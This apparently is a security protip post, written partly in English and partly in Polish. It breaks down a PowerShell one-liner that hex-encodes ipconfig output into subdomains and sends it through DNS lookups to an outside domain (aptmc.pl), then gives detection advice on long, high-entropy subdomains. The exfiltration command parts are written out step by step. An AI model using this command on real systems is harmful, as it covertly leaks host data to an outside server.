DNS exfiltration in a single line
DNS exfiltration already appeared in protip 000d, but there it was a multi-line script. Here the same functionality is packed into a single command — strikingly similar to my favourite ICMP exfiltration oneliner from protip 0072.
How it works — step by step
Let's break the oneliner down:
-join (...)
Operator -join po lewej stronie wyrażenia złączy wszystkie znaki z tablicy znakiem pustym.
(ipconfig /all|Out-String)
Uruchamiamy ipconfig, a wynik wysyłamy do Out-String, dzięki czemu całość zostaje przekazana dalej jako jeden łańcuch znaków.
-split "(.{64})"
Dzielimy string separatorem zdefiniowanym wyrażeniem regularnym .{64} (dowolne 64 znaki). Nawias okrągły sprawia, że -split zwraca także same separatory.
%{ "{0:X2}"-f[int]$_ }
% to alias na ForEach-Object. Każdy znak zamieniamy na postać szesnastkową (wielkie litery, dokładnie 2 znaki).
-match "."
Operator -match filtruje tablicę, zostawiając tylko elementy zawierające jakiś znak — pozbywamy się pustych linii.
-replace "([\w]{16})", "`$1."
Każde 16 znaków zamieniamy na te same 16 znaków zakończone kropką — dzielimy domenę na subdomeny po 16 znaków. Końcową kropkę usuwamy metodą .trim('.').
Resolve-DNSName "$_.$(($i++)).aptmc.pl"
Budujemy pełną domenę z subdomen z payloadem i odpytujemy Resolve-DNSName — w ten sposób eksfiltrowane dane trafiają do serwera obsługującego domenę.
What to catch: a flood of DNS queries for long, random-looking subdomains under the same parent domain. Monitor name length and entropy plus the count of unique subdomains per domain — a classic DNS tunnelling / exfiltration pattern.